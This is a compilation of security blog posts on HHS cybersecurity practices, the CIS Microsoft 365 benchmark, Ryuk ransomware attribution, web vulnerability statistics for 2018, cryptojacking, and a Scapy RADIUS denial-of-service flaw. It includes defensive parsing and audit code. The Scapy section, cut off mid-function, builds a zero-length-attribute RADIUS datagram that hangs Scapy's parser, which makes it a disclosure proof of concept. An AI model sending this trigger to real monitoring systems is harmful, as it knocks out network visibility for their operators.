Finally, the Resources and Template Volume maps the 10 cybersecurity practices and sub-practices to the NIST Cybersecurity Framework. It also provides templates such as a Laptop, Portable Device, and Remote Use Policy and Procedure, Security Incident Response Plan, an Access Control Procedure, and a Privacy and Security Incident Report.

In announcing the Cybersecurity Practices, the HHS Acting Chief Information Security Officer stated that cybersecurity is “the responsibility of every organization working in healthcare and public health. In all of our efforts, we must recognize and leverage the value of partnerships among government and industry stakeholders to tackle the shared problems collaboratively.”

The Cybersecurity Practices follow other key important cybersecurity documents published by HHS, including the checklist on cyberattacks and the ransomware fact sheet.

Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available

This post was cowritten by Jonathan Trull, Chief Security Advisor, Cybersecurity Solutions Group, and Sean Sweeney, Chief Security Advisor, Cybersecurity Solutions Group.

We’re excited to announce the availability of the Center for Internet Security’s (CIS) Microsoft 365 Foundations Benchmark, developed by CIS in partnership with Microsoft, to provide prescriptive guidance for establishing a secure baseline configuration for Microsoft 365. CIS is a nonprofit entity focused on developing global standards and recognized best practices for securing IT systems and data against the most pervasive attacks.

Microsoft 365 provides powerful online cloud services that enable collaboration, security, and compliance, mobility, intelligence, and analytics. Adopting cloud technologies requires a shared responsibility model for security, with Microsoft responsible for certain controls and the customer responsible for others, depending on the service delivery model chosen. To ensure that a customer’s cloud workloads are protected, it is important that they carefully consider and implement the appropriate architecture and enable the right set of configuration settings.

The CIS Microsoft 365 Foundations Benchmark is designed to assist organizations in establishing the foundation level of security for anyone adopting Microsoft 365. The benchmark should not be considered as an exhaustive list of all possible security configurations and architecture but as a starting point. Each organization must still evaluate their specific situation, workloads, and compliance requirements and tailor their environment accordingly.

The CIS benchmark contains two levels, each with slightly different technical specifications:

  • Level 1: Recommended minimum security settings that should be configured on any system and should cause little or no interruption of service or reduced functionality.
  • Level 2: Recommended security settings for highly secure environments that could result in some reduced functionality.

The CIS Microsoft 365 Security Benchmark is divided into the following sections:

| Section | Description | # of recommended controls |
|---|---|---|
| Account/Authentication policies | Recommendations related to setting the appropriate account and authentication policies. | 8 |
| Application permissions | Recommendations related to the configuration of application permissions within Microsoft 365. | 4 |
| Data management | Recommendations for setting data management policies. | 6 |
| Email security/Exchange Online | Recommendations related to the configuration of Exchange Online and email security. | 13 |
| Auditing policies | Recommendations for setting auditing policies on your Microsoft 365 tenant. | 14 |
| Storage policies | Recommendations for securely configuring storage policies. | 2 |
| Mobile device management | Recommendations for managing devices connecting to Microsoft 365. | 13 |
| Total recommendations | | 60 |

Each recommendation contains several sections, including a recommendation identification number, title, and description; level or profile applicability; rationale; instructions for auditing the control; remediation steps; impact of implementing the control; default value; and references. For example, the first control contained in the benchmark is under the Account/Authentication policies section and is titled: 1.1 (L1) Ensure multifactor authentication is enabled for all users in administrative roles (Scored).

A control is marked as Scored or Not Scored based on whether it can be programmatically tested. In this case, recommendation 1.1 can be audited using the Microsoft Graph and a PowerShell cmdlet. The specific steps for auditing the control are contained in the Audit section for this specific recommendation. This recommendation is listed as a Level 1 control because it applies only to Microsoft 365 administrative users and would not have a company-wide impact or reduce functionality for users. The rationale for recommendation 1.1 is that Microsoft 365 administrative accounts need to be protected due to their powerful privileges; with multifactor authentication, an attacker would need to compromise at least two different authentication mechanisms, increasing the difficulty of compromise and thus reducing the risk to the Azure tenant.
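What a programmatic (Scored) check of recommendation 1.1 looks like, as an added example that is neither the benchmark's own audit procedure nor Microsoft's tooling: it evaluates a snapshot of directory roles, role members and registered authentication methods and reports administrative users with no second factor. The record shapes and `@odata.type` names are assumed to resemble what Microsoft Graph returns; the snapshot itself is constructed.

```python
from typing import Dict, List

# A password alone is not a second factor; any of these registered methods counts as MFA.
# (Assumed Graph type names; adjust to the methods your tenant exposes.)
MFA_METHOD_TYPES = {
    "#microsoft.graph.microsoftAuthenticatorAuthenticationMethod",
    "#microsoft.graph.phoneAuthenticationMethod",
    "#microsoft.graph.fido2AuthenticationMethod",
    "#microsoft.graph.softwareOathAuthenticationMethod",
}


def administrative_user_ids(directory_roles: List[Dict], role_members: Dict[str, List[Dict]]) -> List[str]:
    """Ids of users holding any role whose name marks it as administrative.

    Service principals and groups in a role are skipped: the control is about users.
    """
    ids = set()
    for role in directory_roles:
        if "Administrator" not in role["displayName"]:
            continue
        for member in role_members.get(role["id"], []):
            if member.get("@odata.type") == "#microsoft.graph.user":
                ids.add(member["id"])
    return sorted(ids)


def has_mfa_method(methods: List[Dict]) -> bool:
    """True when at least one registered method is something other than a password."""
    return any(m.get("@odata.type") in MFA_METHOD_TYPES for m in methods)


def evaluate_cis_1_1(snapshot: Dict) -> Dict:
    """Scored control: PASS only when every administrative user has an MFA method."""
    users_by_id = {u["id"]: u for u in snapshot["users"]}
    failing = []
    for uid in administrative_user_ids(snapshot["directoryRoles"], snapshot["roleMembers"]):
        methods = snapshot["authenticationMethods"].get(uid, [])  # no record at all also fails
        if not has_mfa_method(methods):
            failing.append(users_by_id[uid]["userPrincipalName"])
    return {
        "control": "1.1",
        "status": "PASS" if not failing else "FAIL",
        "nonCompliant": sorted(failing),
    }


# Constructed snapshot: two admin roles, one non-admin role, a service principal in an admin role.
SAMPLE_SNAPSHOT = {
    "directoryRoles": [
        {"id": "role-global", "displayName": "Global Administrator"},
        {"id": "role-exchange", "displayName": "Exchange Administrator"},
        {"id": "role-readers", "displayName": "Directory Readers"},
    ],
    "roleMembers": {
        "role-global": [
            {"@odata.type": "#microsoft.graph.user", "id": "u-alice"},
            {"@odata.type": "#microsoft.graph.servicePrincipal", "id": "sp-backup"},
        ],
        "role-exchange": [
            {"@odata.type": "#microsoft.graph.user", "id": "u-bob"},
            {"@odata.type": "#microsoft.graph.user", "id": "u-carol"},
        ],
        "role-readers": [{"@odata.type": "#microsoft.graph.user", "id": "u-dave"}],
    },
    "users": [
        {"id": "u-alice", "userPrincipalName": "alice@contoso.example"},
        {"id": "u-bob", "userPrincipalName": "bob@contoso.example"},
        {"id": "u-carol", "userPrincipalName": "carol@contoso.example"},
        {"id": "u-dave", "userPrincipalName": "dave@contoso.example"},
    ],
    "authenticationMethods": {
        "u-alice": [
            {"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"},
            {"@odata.type": "#microsoft.graph.microsoftAuthenticatorAuthenticationMethod"},
        ],
        "u-bob": [{"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"}],
        "u-carol": [{"@odata.type": "#microsoft.graph.fido2AuthenticationMethod"}],
        "u-dave": [{"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"}],
    },
}


if __name__ == "__main__":
    print(evaluate_cis_1_1(SAMPLE_SNAPSHOT))
```

Dave has only a password but holds no administrative role, so he is not flagged; Bob is.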

Download the benchmark and provide your feedback

The CIS Microsoft 365 Security Benchmark is freely available for download in PDF format on the CIS website. As part of CIS’s mission, feedback from those who use and implement the benchmarks gives us the opportunity to continuously improve them. Feedback can be made visible to CIS by creating a discussion thread or ticket within the CIS Microsoft 365 Foundations Benchmark community. In addition, Microsoft has developed a set of Office 365 security guidelines and best practices for our customers to follow. These guides can be found in the Office 365 Security and Compliance documentation.

The post Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available appeared first on Microsoft Secure.

Ryuk Ransomware Attack: Rush to Attribution Misses the Point

Senior analyst Ryan Sherstobitoff contributed to this report.

During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack, many have cited past research that compares code from Ryuk with the older Hermes ransomware to link the attack to North Korea. That attribution was based largely on two facts: Hermes has been used in the past by North Korean actors, and code blocks in Ryuk are similar to those in Hermes.

The McAfee Advanced Threat Research team has investigated this incident and determined how the malware works, how the attackers operate, and how to detect it. Based on the technical indicators, known cybercriminal characteristics, and evidence discovered on the dark web, our hypothesis is that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the hallmarks of a cybercrime operation.

How McAfee approaches attribution

Attribution is a critical part of any cybercrime investigation. However, technical evidence is often not enough to positively identify who is behind an attack because it does not provide all the pieces of the puzzle. Artifacts do not all appear at once; a new piece of evidence unearthed years after an attack can shine a different light on an investigation and introduce new challenges to current assumptions.

Ryuk attack: putting the pieces together

In October 2017, we investigated an attack on a Taiwanese bank. We discovered the actors used a clever tactic to distract the IT staff: a ransomware outbreak timed for the same moment that the thieves were stealing money. We used the term pseudo-ransomware to describe this attack. The malware was Hermes version 2.1.

One function we often see in ransomware samples is a check that aborts execution if the victim's system language identifier (a Windows LCID, listed here in hexadecimal) is one of the following:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

That was October 2017. Searching earlier events, we noticed a posting from August 2017 in an underground forum in which a Russian-speaking actor offered the Hermes 2.1 ransomware kit for sale:

What if the actor who attacked the Taiwanese bank simply bought a copy of Hermes and added it to the campaign to cause the distraction? Why go to the trouble of building something when the actor can simply buy the perfect distraction in an underground forum?

In the same underground forum thread we found a post from October 22, 2018, mentioning Ryuk.

This post contains a link to an article in the Russian security magazine Xakep.ru (“Hacker”) discussing the emergence of Ryuk and how it was first discovered by MalwareHunterTeam in August 2018. This first appearance came well before last week’s attack on newspaper printing services.

Manga connection

Ryuk, according to Wikipedia, refers to a Japanese manga character from the series “Death Note.” Ryuk apparently drops a death note, a fitting name for ransomware that drops ransom notes.

Ransomware is typically named by its cybercriminal developer, whereas state-sponsored malware is mostly named by the security industry. It seems the criminals behind Ryuk are into manga.

The use of manga character names and references is common in the cybercriminal scene. We often come across manga-inspired nicknames and avatars in underground forums.

Technical indicators

Looking at research from our industry peers comparing Ryuk and Hermes, we notice that the functionality is largely the same. We agree that the actors behind Ryuk have access to the Hermes source code.

Let’s dive a bit deeper into Ryuk and compare samples over the last couple of months regarding compilation times and the presence of program database (PDB) paths:

We can see the PDB paths are almost identical. When we compare samples from August and December 2018 and focus on the checksum values of the executables' Rich headers, they are also identical. (The Rich header is an undocumented structure that the Microsoft linker places between the DOS stub and the PE header; it records the compiler and linker tool versions used for the build, and its XOR key, computed over the DOS header and the tool entries, is the checksum compared here. Identical keys across samples point to the same build environment.)
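As an added illustration of the two indicators compared above (not McAfee's tooling), the following Python extracts the CodeView PDB path and the Rich header from raw PE bytes and summarises them per sample. The SAMPLE blob at the bottom is constructed to exercise the parsers and contains a made-up path, GUID and tool identifiers, not bytes from a Ryuk binary; on a real file, read the whole executable into `data`.

```python
"""Extract the two build-environment indicators compared above from raw PE
bytes: the CodeView (RSDS) PDB path and the linker's Rich header, whose XOR key
is the checksum the post compares across samples. Added example, not McAfee's
tooling. SAMPLE is a constructed blob with a made-up path, GUID and tool ids,
not bytes from a Ryuk binary; for a real file use data = open(path, "rb").read()."""
import struct
import uuid

DANS = struct.unpack("<I", b"DanS")[0]


def parse_rich_header(data):
    """Return (key, [(product_id, build, count), ...]) or None if absent.
    Layout, all little-endian DWORDs between the DOS stub and the PE header:
        "DanS"^key, key, key, key, (comp_id^key, count^key)*, "Rich", key
    The key is also the checksum the linker computed over the DOS header and the
    entries, so binaries from the same toolchain and project share it."""
    end = data.find(b"Rich")
    if end == -1 or end + 8 > len(data):
        return None
    key = struct.unpack_from("<I", data, end + 4)[0]
    start = end - 4
    # Walk back one DWORD at a time until the encrypted "DanS" marker appears.
    while start >= 0 and struct.unpack_from("<I", data, start)[0] != DANS ^ key:
        start -= 4
    if start < 0:
        return None
    entries = []
    # Skip the marker and its three key-padded DWORDs, then decode each pair.
    for off in range(start + 16, end, 8):
        comp_id, count = (v ^ key for v in struct.unpack_from("<II", data, off))
        entries.append((comp_id >> 16, comp_id & 0xFFFF, count))
    return key, entries


def parse_codeview_pdb(data):
    """Return (guid, age, pdb_path) from an RSDS CodeView record, or None.
    Layout: "RSDS", 16-byte GUID, DWORD age, NUL-terminated path."""
    off = data.find(b"RSDS")
    if off == -1 or off + 24 > len(data):
        return None
    guid = uuid.UUID(bytes_le=data[off + 4:off + 20])
    age = struct.unpack_from("<I", data, off + 20)[0]
    end = data.find(b"\x00", off + 24)
    path = data[off + 24:len(data) if end == -1 else end].decode("latin-1")
    return guid, age, path


def indicators(data):
    """The fields one would tabulate per sample before comparing them."""
    rich = parse_rich_header(data)
    cv = parse_codeview_pdb(data)
    return {
        "rich_key": rich[0] if rich else None,
        "toolchain": sorted({(prod, build) for prod, build, _ in rich[1]}) if rich else [],
        "pdb_path": cv[2] if cv else None,
    }


def build_rich_header(key, entries):
    """Test fixture only: encode entries the way the linker would, with a chosen key."""
    out = struct.pack("<IIII", DANS ^ key, key, key, key)
    for prod, build, count in entries:
        out += struct.pack("<II", ((prod << 16) | build) ^ key, count ^ key)
    return out + b"Rich" + struct.pack("<I", key)


# Constructed sample: DOS stub fragment, Rich header, PE magic, RSDS record.
SAMPLE_KEY = 0x8A2F1C44
SAMPLE_ENTRIES = [(0x0001, 0, 123), (0x00FD, 25203, 9), (0x00FF, 25203, 1)]  # hypothetical ids
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_PDB = "C:\\build\\sample\\Release\\sample.pdb"
SAMPLE = (
    b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 7
    + build_rich_header(SAMPLE_KEY, SAMPLE_ENTRIES)
    + b"PE\x00\x00" + b"\x00" * 40
    + b"RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 2) + SAMPLE_PDB.encode() + b"\x00"
)

if __name__ == "__main__":
    print(indicators(SAMPLE))
```

With a key and a PDB path extracted from each sample, the clustering described in the text reduces to comparing the `indicators()` dictionaries; a differing key with the same PDB path is the first thing to look at, since it means the project name survived but the build environment did not.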

From a call-flow perspective, we notice the similarities and evolution of the code:

The Hermes 2.1 ransomware kit, renamed and redistributed as Ryuk.

The author and seller of Hermes 2.1 emphasizes that what he is selling is a kit and not a service. This suggests that a buyer of the kit must do some fine-tuning, setting up a distribution method (spam, exploit kit, or RDP, for example) and infrastructure to make Hermes work effectively. If changing the name and the ransom note are part of these tuning options, then it is likely that Ryuk is an altered version of Hermes 2.1.

Attribution: analyzing competing hypotheses

In the race to determine who is behind an attack, research facts (the What and How questions) are often put aside to focus on attribution (the Who question). Who did it? This pursuit is understandable yet fundamentally flawed. Attribution is crucial, but there will always be unanswered questions. Our approach focuses on answering the What and How questions by analyzing the malware, the infrastructure involved, and the incident response performed at the victim’s site.

Our approach is always to analyze competing hypotheses. When investigating an incident, we form several views and compare all the artifacts against each of them. We seek not only verifying evidence but also actively try to find evidence that falsifies a hypothesis. Keeping our eyes open for falsifying facts and constantly questioning our results are essential steps to avoid confirmation bias. By following this method, we find the strongest hypothesis is not the one with the most verifying evidence but the one with the least falsifying evidence.

Examining competing hypotheses is a scientific approach to investigating cyber incidents. It may not help with the race to attribution, but it ensures the output is based on available evidence.

The most likely hypothesis in the Ryuk case is that of a cybercrime operation built from a tool kit offered by a Russian-speaking actor. From the evidence, we see sample similarities over the past several months that indicate a tool kit is being used. The actors have targeted several sectors and have demanded a high ransom, 500 Bitcoin. Who is responsible? We do not know. But we do know how the malware works, how the attackers operate, and how to detect the threat. That analysis is essential because it allows us to serve our customers.

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

Guide to Developing a National Cybersecurity Strategy—a resource for policymakers to respond to cybersecurity challenges

Nations from every corner of the world are increasingly leveraging digital transformation to grow their economies and empower businesses to improve services, including vital services provided by critical infrastructures. This adoption of new information communications technologies (ICT) has unfortunately been accompanied by a rapid expansion in the frequency and severity of cyberattacks, prompting government policymakers to seek solutions that address these new challenges. The recently released Guide to Developing a National Cybersecurity Strategy provides helpful guidance to support this work.

Developing effective policies to respond to cybersecurity challenges requires more than a whole-of-government response; it involves a whole-of-nation effort, with government ministries and experts from across sectors of the economy and from civil society collaborating to create approaches that simultaneously improve security and enable innovation. The Guide to Developing a National Cybersecurity Strategy is a comprehensive document for policymakers working to either establish, or update and evolve upon, their respective national cybersecurity strategies. It was developed in partnership with leading voices from government, civil society, academia, and industry.

Such authentic multi-stakeholder collaboration is essential, though too often absent, in the development of effective cybersecurity policies. This type of engagement takes time and commitment from all parties involved to engage in a deliberate and iterative process, listening to and valuing all perspectives, to reach agreement. While requiring greater time and careful balance, this type of inclusive process results in policies that are effective and enduring. We at Microsoft are grateful to have been included in the development of this guide and are proud of the result.

The Guide to Developing a National Cybersecurity Strategy should be used by policymakers tasked with developing or improving upon national strategies. It carefully lays out both the process for developing cyber strategies, as well as the essential content that needs to be included, based on international best practices, regardless of the cultural, social, or economic context of any particular country. The process and content provided in the guide are presented across four main sections, which include:

  • An essential overview of cybersecurity policymaking: a brief summary, the overview includes clear definitions and explanations of associated topics and concepts that policymakers should keep top of mind when developing a national strategy.
  • The strategy development lifecycle: outlines the lifecycle of developing and then maintaining an effective national cybersecurity strategy, breaking down the essential steps along the way, explaining who needs to be included in the decision-making process, and then how the strategy is to be implemented and managed once it is complete.
  • Overarching principles of a strategy: shifts the focus to the content of the strategy itself. The principles provide policymakers with high-level, fundamental considerations that must be taken into account during the development of effective strategies.
  • Focus areas and good practices: zooms in on specifics. It identifies the key elements and topics that should be addressed during the development of a strategy by walking through seven specific focus areas.

The guide truly is a valuable resource for policymakers in any context, whether a nation's cybersecurity strategy is currently in place or still needs to be developed. Because that is perhaps the most important lesson of the guide itself: a national cybersecurity strategy is not simply a box to be checked and set aside, but rather an ongoing and recursive process of creating, implementing, and improving strategies to adapt to new opportunities and challenges associated with the ever-evolving world of technology.

The post Guide to Developing a National Cybersecurity Strategy—a resource for policymakers to respond to cybersecurity challenges appeared first on Microsoft Secure.

The State of Web Application Vulnerabilities in 2018

(Jan. 12 update:  Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)

As a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability’s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did last year, we took a look back at 2018 to understand the changes and trends in web application security over the past year.

The bad news is that in 2018, like 2017, we continued to see an increasing number of web application vulnerabilities, particularly injection vulnerabilities such as SQL injection, command injection, and object injection. On the content management system (CMS) front, WordPress vulnerabilities continue to grow and continue to dominate the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer numbers, Drupal vulnerabilities had a larger effect and were used in mass attacks that targeted hundreds of thousands of sites during 2018. There is some good news for the security industry, however: the number of Internet of Things (IoT) vulnerabilities declined, as did the number of vulnerabilities related to weak authentication. In the server-side technologies category, the number of PHP vulnerabilities continued to decline, and the growth in API vulnerabilities also slowed slightly.

2018 Web Application Vulnerabilities Statistics

The first phase in our yearly analysis was to check the number of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities have no available solution, such as a software upgrade, workaround, or patch.



Figure 1: Number of web application vulnerabilities in 2016-2018

Vulnerabilities by Category

In Figure 2, you can find 2018 vulnerabilities split into OWASP TOP 10 2017 categories.

Most Common Vulnerability: Injections

The dominant category this year was by far injections, with 19% (3,294) of the total vulnerabilities of 2018, a 267% increase from last year. When talking about injection vulnerabilities, the first thing that comes to mind is SQL injection. Drilling down into the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 (8%) for SQLi.

Figure 2: Vulnerabilities by category, 2014-2018

No. 2 Vulnerability — Cross-Site Scripting

The number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.

IoT Vulnerabilities Decreased

The number of IoT vulnerabilities appears to have decreased considerably. Despite the common belief that all our electronic devices can be easily compromised, something has changed in this area. Possible explanations include IoT vendors finally implementing better security in their devices, or hackers and researchers finding another area to focus on in 2018.


Figure 3: IoT vulnerabilities 2014-2018

API Vulnerabilities: Growing, but Slowing

API (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).


Figure 4: API vulnerabilities 2015-2018

Although API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.

Vulnerabilities in Content Management Systems: Attackers Focused on WordPress

The most popular content management system is WordPress, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by Joomla and Drupal. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).


Figure 5: Number of vulnerabilities by CMS platform 2016-2018

According to the WordPress official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.


Figure 6: Number of WordPress plugins

Despite the slowed growth in new plugins, the number of WordPress vulnerabilities increased. The explanation could be either the code quality of the plugins or the fact that WordPress is such a popular CMS, which motivates more attackers to develop dedicated attack tools and try their luck searching for holes in the code.

Unsurprisingly, 98% of WordPress vulnerabilities are related to plugins (see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it: WordPress is open source, easy to manage, and there is no enforcement or proper process that mandates minimum security standards (e.g., code analysis). Hence, WordPress plugins are prone to vulnerabilities.


Figure 7: WordPress third party vendor vulnerabilities in 2018

Figure 8 below lists the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins: the report counts the vulnerabilities published during the year, as aggregated by our system from different sources, and our annual report is based solely on those statistics. Other measures, such as 'top attacked' or 'riskiest', are not included in the report and do not necessarily correlate with this one.



Figure 8: Top 10 vulnerable WordPress plugins in 2018

Server Technologies: PHP Vulnerabilities Fell

Since PHP remains the most popular server-side programming language for websites, we expect it to have more vulnerabilities than comparable languages, and it did. However, as Figure 9 below shows, new PHP vulnerabilities fell in 2018 versus 2017, just as they did the prior year. The scarcity of new PHP feature releases (only one minor version, PHP 7.3, shipped, in December) could explain why.


Figure 9: Top server-side technology vulnerabilities 2014-2018

The Year of Drupal

Although Drupal is only the third most popular CMS, two of its vulnerabilities, CVE-2018-7600 (Drupalgeddon2, the '23-mar' bar in Figure 10 below) and CVE-2018-7602 (Drupalgeddon3, the '25-apr' bar), were the root cause of security breaches on hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations, and were used to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.

The simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting blogs we wrote this year. Another risky vulnerability, part of the Drupal security patch sa-core-2018-006 published in October, was not easy to exploit, so the number of attacks was small.


Figure 10: CVSS Score of Drupal vulnerabilities in 2018

Predictions for 2019

As a security vendor, we’re often asked about our predictions. Here are our vulnerability predictions for 2019:

  • PHP announced that versions 5.5, 5.6 and 7.0 have reached end of life, meaning they will no longer receive security updates. Major CMSs like WordPress, Drupal, and Joomla are written in PHP and recommend newer PHP versions, but they still run on the older ones. The result is that attackers are now motivated to find new vulnerabilities in unsupported PHP versions, since those will never be fixed and affect every application running on them. For example, according to Shodan there are currently 34K servers running these unsupported PHP versions.
  • Injection vulnerabilities will continue to grow, mainly because of the economic incentive for attackers (fast money).
  • More vulnerabilities in APIs will be discovered as DevOps becomes a crucial factor in IT and the usage of and demand for APIs grows.

How to Protect Your Apps and Data

One of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or a combination of both depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it’s important to think through your security requirements. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.


The post The State of Web Application Vulnerabilities in 2018 appeared first on Blog.

Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker

By now, you've probably heard of cryptocurrency, but you may not know exactly what it is. To put it simply, cryptocurrencies are virtual currencies that have actual monetary value in today's world. Their transactions are recorded in a single shared database, or public ledger, whose entries cannot be changed without fulfilling certain conditions. Transactions are verified and added to the public ledger through cryptocurrency mining: miners compile transactions into blocks and solve computationally hard problems, competing with other miners for the reward. While mining can be lucrative, it requires large amounts of computing power.

Unfortunately, the need for massive amounts of hardware has prompted cybercriminals to turn to cryptojacking, the use of malware to exploit victims' computers to mine cryptocurrency. Cybercrooks spread cryptojacking malware through sketchy mobile apps, flawed software, and malware-infected ads. They can even cryptojack your device during a browsing session on a website that appears completely harmless. Once a device is infected, the malware consumes its CPU, making the fan run loudly while the malware mines in the background. Unfortunately, the symptoms of cryptojacking are usually subtle, with poor device performance being one of the few signs of its presence.

Thankfully, McAfee WebAdvisor is here to help. This security solution, which helps block users from malware and phishing attempts, now includes Cryptojacking Blocker. This enhancement is a Windows-based browser add-on available for Google Chrome that helps stop malicious websites from mining for cryptocurrency. So far, our direct and retail McAfee WebAdvisor customers have already started receiving the update that adds Cryptojacking Blocker to their product, and the customers who have WebAdvisor through other partners should begin to see this update roll out during Q1. The same thing goes for those who own McAfee LiveSafe and McAfee Total Protection. Additionally, we’re aiming to add support for Firefox in the coming months. And if you don’t already have WebAdvisor, you can download it for free on our website, with Cryptojacking Blocker included in your download.

In addition to using a security solution like McAfee WebAdvisor, here are some other general tips to help you stay safe online:

  • Create a strong, unique password. Although it may be easier to remember, reusing passwords across multiple accounts puts all of your data at risk even if just one of your accounts is breached. Choosing a complex password for each individual online account will act as a stronger first line of defense. You can also use a password manager so all of your credentials are consolidated into one place.
  • Be careful where you click. If you come across a website that seems sketchy or notice that the URL address looks odd, avoid interacting with the site entirely. Stick to browsing websites you know are reputable.
  • Update, update, update! Cybercriminals can take advantage of old software to spread cryptojacking malware. Keeping your software updated with the latest patches and security fixes can help you combat this threat.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker appeared first on McAfee Blogs.

Scapy-sploit: Python Network Tool is Vulnerable to Denial of Service (DoS) Attack CVE pending

We recently discovered that the latest version of Scapy, a powerful packet manipulation tool used by cybersecurity researchers and network engineers, is susceptible to a Denial of Service (DoS) vulnerability. Ironically, we found this vulnerability while researching ways to better detect and fight DDoS attacks.

Written in the very popular Python language, Scapy uses a heuristic to determine the type of network packet it is inspecting. Because the heuristic relies on port numbers, the packet type can easily be spoofed: a UDP datagram sent on a standard RADIUS port (1812 or 1813) is dissected as RADIUS regardless of its contents. In this case, the vulnerability occurs when Scapy is tricked into treating a packet as RADIUS. It is due to a lack of input validation when reading the length field of the packet's Attribute Value Pairs (AVPs), which can cause an infinite loop in the following code section if that byte is set to zero:


When Scapy parses a UDP RADIUS packet that has an AVP with a length byte equal to zero, the getfield function does not shorten the remain value in the while loop. (RFC 2865 requires every attribute length to be at least 2, because it covers the type and length bytes themselves, so zero is never legitimate.) The loop therefore never terminates and Scapy hangs, or eventually dies, a Denial of Service (DoS) against whatever is using it. This can affect the health of an enterprise network; for instance, if IT uses Scapy to monitor network traffic, the monitoring process will stop functioning.
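To make the failure concrete without Scapy installed, here is an added example (not Scapy's source) that imitates the shape of the vulnerable getfield() loop in plain Python, places a hardened version beside it, and builds the RFC 2865 datagram that triggers the bug: a well-formed header followed by a single attribute whose length byte is zero. The header layout, attribute types and port number are standard; the sample bytes are constructed, and the iteration cap in the vulnerable version is there only so the demonstration raises instead of hanging.

```python
"""Plain-Python reproduction of the RADIUS attribute loop described above and of
the datagram that triggers it. Added example, not Scapy's source: the two parse
functions imitate the shape of a PacketListField.getfield() loop so the hang can
be shown without Scapy installed. The header layout and attribute types follow
RFC 2865; the sample bytes are constructed."""
import os
import struct

RADIUS_ACCESS_REQUEST = 1
RADIUS_AUTH_PORT = 1812      # Scapy's port heuristic maps UDP/1812 to its RADIUS dissector
HEADER_LEN = 20              # code(1) id(1) length(2) authenticator(16)


def avp(attr_type, value):
    """Well-formed attribute: type, length (type+length+value, so always >= 2), value."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


# The trigger: one attribute whose length byte is zero. Nothing else is malformed.
ZERO_LENGTH_AVP = struct.pack("!BB", 1, 0)   # type 1 = User-Name


def build_radius_datagram(attributes, identifier=1):
    """Access-Request with a random authenticator and the given attribute bytes."""
    return (struct.pack("!BBH", RADIUS_ACCESS_REQUEST, identifier, HEADER_LEN + len(attributes))
            + os.urandom(16) + attributes)


def radius_attributes(datagram):
    """Strip the fixed header; the remainder is what the attribute list field parses."""
    return datagram[HEADER_LEN:]


def parse_avps_vulnerable(remain, max_iterations=10_000):
    """Mirrors the flawed loop: slice off `length` bytes per pass. With length 0 the
    slice is empty, `remain` never shrinks and the loop never ends. The iteration
    cap exists only so this demonstration raises instead of hanging."""
    attrs, iterations = [], 0
    while remain:
        iterations += 1
        if iterations > max_iterations:
            raise RuntimeError("no progress after %d iterations: infinite loop" % max_iterations)
        length = remain[1]
        attrs.append((remain[0], remain[2:length]))
        remain = remain[length:]
    return attrs


def parse_avps_fixed(remain):
    """Hardened loop (illustrative; the linked Scapy pull request is the upstream
    fix): reject lengths below the RFC 2865 minimum of 2, attributes that run past
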